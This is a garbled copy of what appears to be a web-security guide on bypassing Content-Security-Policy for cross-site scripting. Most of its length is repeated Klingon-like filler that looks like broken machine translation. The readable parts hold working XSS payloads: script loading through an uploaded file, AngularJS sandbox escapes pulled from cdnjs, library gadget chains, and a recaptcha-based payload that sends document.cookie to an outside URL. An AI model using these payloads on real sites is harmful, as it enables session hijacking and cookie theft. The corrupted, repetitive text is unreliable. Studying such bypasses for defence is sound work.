'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhut
"/>'><script src="/uploads/picture.png.js"></script>
However, it's highly probable that the server is validating the uploaded file and will only allow you to upload determined type of files.
Moreover, even if you could upload a JS code inside a file using an extension accepted by the server (like: script.png) this won't be enough because some servers like apache server select MIME type of the file based on the extension and browsers like Chrome will reject to execute Javascript code inside something that should be an image. "Hopefully", there are mistakes. For example, from a CTF I learnt that Apache doesn't know the .wave extension, therefore it doesn't serve it with a MIME type like audio/*.
From here, if you find a XSS and a file upload, and you manage to find a misinterpreted extension, you could try to upload a file with that extension and the Content of the script. Or, if the server is checking the correct format of the uploaded file, create a polyglot (some polyglot examples here).
Third Party Endpoints + ('unsafe-eval')
{% hint style="warning" %}
For some of the following payload unsafe-eval is not even needed.
{% endhint %}
Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';
Load a vulnerable version of angular and execute arbitrary JS:
Klingon Translation:
'ej vItlhutlh 'ej 'ay' 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vItlhutlh 'ej vIt
```xml
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>
"><script src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
"><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>
With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-author-writeup/
<script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js></script>
<iframe/ng-app/ng-csp/srcdoc="
<script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.0/angular.js>
</script>
<img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>"
>
Payloads using Angular + a library with functions that return the window object (check out this post):
{% hint style="info" %}
The post shows that you could load all libraries from cdn.cloudflare.com (or any other allowed JS libraries repo), execute all added functions from each library, and check which functions from which libraries return the window object.
{% endhint %}
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
<div ng-app ng-csp>
{{$on.curry.call().alert(1)}}
{{[].empty.call().alert([].empty.call().document.domain)}}
{{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script>
<div ng-app ng-csp>
{{$on.curry.call().alert('xss')}}
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/mootools/1.6.0/mootools-core.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script>
<div ng-app ng-csp>
{{[].erase.call().alert('xss')}}
</div>
Abusing google recaptcha JS code
According to this CTF writeup you can abuse https://www.google.com/recaptcha/ inside a CSP to execute arbitrary JS code bypassing the CSP:
<div
ng-controller="CarouselController as c"
ng-init="c.init()"
>
[[c.element.ownerDocument.defaultView.parent.location="http://google.com?"+c.element.ownerDocument.cookie]]
<div carousel><div slides></div></div>
<script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>
Hochlogh ghItlh + JSONP
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
HTML
<script src="https://third-party.com/endpoint?callback=handleResponse"></script>
tlhIngan Hol
<script src="https://third-party.com/endpoint?callback=handleResponse"></script>
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
